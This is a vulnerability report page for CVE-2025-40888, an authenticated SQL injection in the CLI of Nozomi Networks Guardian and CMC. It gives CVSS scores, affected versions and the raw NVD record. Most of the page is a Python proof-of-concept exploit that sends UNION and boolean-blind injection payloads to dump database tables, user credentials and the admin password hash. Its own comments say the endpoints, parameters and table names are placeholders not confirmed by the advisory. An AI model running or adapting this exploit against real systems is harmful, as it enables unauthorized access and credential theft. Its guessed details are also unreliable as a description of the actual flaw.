Security Vulnerability Report
CVE-2025-40888 CVSS 5.3 MEDIUM

CVE-2025-40888

Published: 2025-10-07 13:15:35
Last Modified: 2025-10-09 16:37:58

Description

A SQL Injection vulnerability was discovered in the CLI functionality due to improper validation of an input parameter. An authenticated user with limited privileges can execute arbitrary SELECT SQL statements on the DBMS used by the web application, potentially exposing unauthorized data.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N (the secondary assessment, normally the CNA's: 5.3 MEDIUM). Note that the NVD primary CVSS v3.1 assessment in the raw JSON below rates Attack Complexity Low instead (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N, 6.5 MEDIUM), and the secondary CVSS v4.0 vector scores 6.0 MEDIUM with Attack Requirements present (AT:P). When triaging, record the discrepancy rather than relying on the lower figure alone; all three agree that the impact is confidentiality-only (arbitrary SELECT) and requires an authenticated low-privilege account.

Configurations (Affected Products)

cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:* - VULNERABLE (versions before 25.3.0)
cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:* - VULNERABLE (versions before 25.3.0)
Nozomi Networks Guardian and CMC prior to 25.3.0 (the NVD configuration gives versionEndExcluding 25.3.0 for both CPEs); consult the vendor advisory NN-2025:10-01 for the exact affected and fixed versions.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only: run it solely against systems you are explicitly permitted to test. Its endpoint paths, command and parameter names, UNION column count and table/column names are placeholders chosen by the PoC author and are not taken from the advisory; confirm them against the real application before relying on any output.
python
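# CVE-2025-40888 PoC - Nozomi Networks CLI SQL Injection (CWE-89)
# Vulnerability: SQL Injection in CLI input parameter validation
#
# What the advisory (NN-2025:10-01 / NVD) actually establishes: an
# authenticated user with limited privileges can run arbitrary SELECT
# statements against the web application's DBMS through a CLI input
# parameter, in Guardian and CMC before 25.3.0.  Everything more specific in
# this file -- the "/cli" base path, the "/login" and "/execute" endpoints,
# the "show-config" command, the "filter" parameter, the three-column UNION
# shape, the "users" table and the MySQL/Oracle-flavoured SQL -- is a
# PLACEHOLDER chosen by the PoC author, not something the advisory confirms.
# Adapt those to the request format observed in an authorized test before
# trusting any output.
#
# Usage: python3 poc.py [BASE_URL] [USERNAME] [PASSWORD]
import sys

import requests

# Placeholders; override on the command line so real credentials are never
# committed into this file.
TARGET_URL = (sys.argv[1] if len(sys.argv) > 1 else "https://target-nozomi-host/cli").rstrip("/")
USERNAME = sys.argv[2] if len(sys.argv) > 2 else "limited_user"
PASSWORD = sys.argv[3] if len(sys.argv) > 3 else "password123"

# Seconds before a hung request is abandoned.  requests has no default
# timeout, so without this one unresponsive appliance stalls the blind loop
# forever.
TIMEOUT = 30

# One session so the cookie obtained at login is reused by every probe.
# TLS verification is deliberately left at the requests default (on); for an
# appliance with a private CA, point REQUESTS_CA_BUNDLE at it instead of
# passing verify=False.
session = requests.Session()

# Response bodies of a known-true and a known-false probe, filled in by
# calibrate_oracle(); blind_sqli() compares against them.
_ORACLE = {}


def _union_payload(injection_payload):
    """Build the ``filter`` value for a UNION-based injection.

    ``injection_payload`` is the text placed after ``UNION SELECT`` (select
    list plus optional FROM/WHERE).  The trailing ``--`` comments out the rest
    of the original query, so callers must not append their own ``--`` (the
    original PoC did, producing ``----``).
    """
    return f"default' UNION SELECT {injection_payload}--"


def _blind_payload(condition):
    """Build the ``filter`` value for one boolean-based blind probe.

    ``FROM dual`` is MySQL/Oracle syntax; PostgreSQL has no ``dual`` table and
    would need the FROM clause dropped.  The advisory does not name the DBMS.
    """
    return f"default' AND (SELECT 1 FROM dual WHERE {condition})='1'--"


def _send_filter(filter_value):
    """POST one ``show-config`` CLI command carrying ``filter_value``.

    Returns the ``requests.Response``; the caller decides how to interpret it.
    """
    cli_command = {"command": "show-config", "filter": filter_value}
    return session.post(f"{TARGET_URL}/execute", json=cli_command, timeout=TIMEOUT)


def exploit_sqli(injection_payload):
    """Send a UNION-based injection and return the raw response body.

    The UNION assumes the original query selects exactly three columns; if the
    server answers with a column-count error, adjust the number of ``null``
    columns in the callers in main().
    """
    return _send_filter(_union_payload(injection_payload)).text


def calibrate_oracle():
    """Record what a TRUE and a FALSE blind probe look like on this target.

    Sends the tautology ``1=1`` and the contradiction ``1=2``.  Returns False
    when both responses are identical, i.e. the injection point is not acting
    as a boolean oracle (or the placeholder endpoint/parameter is wrong) and
    character-by-character extraction would only return noise.
    """
    _ORACLE["true"] = _send_filter(_blind_payload("1=1")).text
    _ORACLE["false"] = _send_filter(_blind_payload("1=2")).text
    return _ORACLE["true"] != _ORACLE["false"]


def blind_sqli(condition):
    """Return True when ``condition`` evaluates true on the target DBMS.

    After calibrate_oracle() the response is matched against the recorded
    TRUE/FALSE bodies (exact match first, then nearest body length).  Without
    calibration it falls back to the original PoC's guess -- an ``exists``
    substring or a body longer than 100 bytes -- which has no basis in the
    advisory and should be treated as unreliable.
    """
    body = _send_filter(_blind_payload(condition)).text
    if not _ORACLE:
        return "exists" in body or len(body) > 100
    if body == _ORACLE["true"]:
        return True
    if body == _ORACLE["false"]:
        return False
    # Dynamic content (timestamps, CSRF tokens) can defeat exact matching;
    # fall back to whichever baseline the body length is closer to.
    return abs(len(body) - len(_ORACLE["true"])) < abs(len(body) - len(_ORACLE["false"]))


def extract_admin_hash(length=32, alphabet="0123456789abcdef"):
    """Recover the admin password hash one character at a time via blind_sqli.

    Assumes a ``users`` table with ``password`` and ``role`` columns and a
    32-character lowercase-hex hash; none of that is confirmed by the
    advisory.  Unlike the original loop, which silently skipped positions
    where nothing matched and printed a shortened hash as if complete, this
    stops at the first position with no match and reports it.  Costs up to
    ``length * len(alphabet)`` requests.
    """
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            cond = f"SUBSTRING((SELECT password FROM users WHERE role='admin'),{pos},1)='{ch}'"
            if blind_sqli(cond):
                recovered += ch
                print(f"[+] Hash so far: {recovered}")
                break
        else:  # no character matched: the oracle or the schema assumption is wrong
            print(f"[!] No match at position {pos}; stopping (oracle or schema assumption wrong)")
            break
    return recovered


def main():
    """Run the PoC end to end; returns a process exit code."""
    # Step 1: authenticate.  The original ignored the login result; with a
    # rejected login every later "injection result" is just the login page.
    login = session.post(
        f"{TARGET_URL}/login",
        data={"username": USERNAME, "password": PASSWORD},
        timeout=TIMEOUT,
    )
    if not login.ok:
        print(f"[-] Login failed: HTTP {login.status_code}")
        return 1
    # NOTE(review): a 2xx does not by itself prove the session is
    # authenticated; if the appliance answers 200 to a failed login, also
    # check for a session cookie in login.cookies.

    # Step 2: UNION-based extraction.  version()/user()/database() are
    # MySQL/PostgreSQL functions; Oracle and MSSQL spell these differently.
    print("[*] Extracting database version...")
    print(f"[+] Result: {exploit_sqli('version(),user(),database()')}")

    print("[*] Enumerating tables...")
    print(f"[+] Tables: {exploit_sqli('table_name,null,null FROM information_schema.tables')}")

    # Dumping credentials goes well beyond what is needed to demonstrate the
    # flaw (the version() query above already does that); only proceed when
    # the engagement's rules of engagement cover data extraction.
    print("[*] Extracting user credentials...")
    print(f"[+] Credentials: {exploit_sqli('username,password,null FROM users')}")

    # Step 3: boolean-based blind fallback for when UNION output is not
    # reflected.  Calibrate first so the oracle is grounded in this target's
    # real TRUE/FALSE responses rather than the original hard-coded guess.
    print("[*] Performing blind SQLi to extract admin password...")
    if not calibrate_oracle():
        print("[-] TRUE and FALSE probes are indistinguishable; skipping blind extraction")
        return 1
    print(f"[+] Admin password hash: {extract_admin_hash()}")
    return 0


if __name__ == "__main__":
    sys.exit(main())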

References

https://security.nozominetworks.com/NN-2025:10-01 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40888", "sourceIdentifier": "[email protected]", "published": "2025-10-07T13:15:34.967", "lastModified": "2025-10-09T16:37:58.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL Injection vulnerability was discovered in the CLI functionality due to improper validation of an input parameter. An authenticated user with limited privileges can execute arbitrary SELECT SQL statements on the DBMS used by the web application, potentially exposing unauthorized data."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.3.0", "matchCriteriaId": "B57D95A7-0CC3-4C20-AEFF-6671B129B5AA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.3.0", "matchCriteriaId": "30E53ED6-F534-45FB-951A-C411EC1C50EE"}]}]}], "references": [{"url": "https://security.nozominetworks.com/NN-2025:10-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}